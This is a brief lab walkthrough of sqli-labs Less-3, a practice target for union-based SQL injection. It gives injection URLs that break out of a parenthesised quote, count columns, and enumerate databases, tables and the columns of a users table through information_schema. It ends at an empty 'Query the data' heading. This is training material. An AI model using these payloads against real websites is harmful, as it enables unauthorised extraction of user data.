SQL-Lib_Less3
View the source code

The source shows that the value is enclosed in parentheses.
Close it with ): ?id=1') --+
Determine the number of columns
http://192.168.72.179/sqli-labs/Less-3/?id=1') order by 3--+
http://192.168.72.179/sqli-labs/Less-3/?id=1') order by 4--+
Use a union query to find where the columns are output on the page
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
Enumerate the databases and find the security database
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+

List the tables in the database
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

List the columns of the users table in the security database
- http://192.168.72.179/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+

Query the data



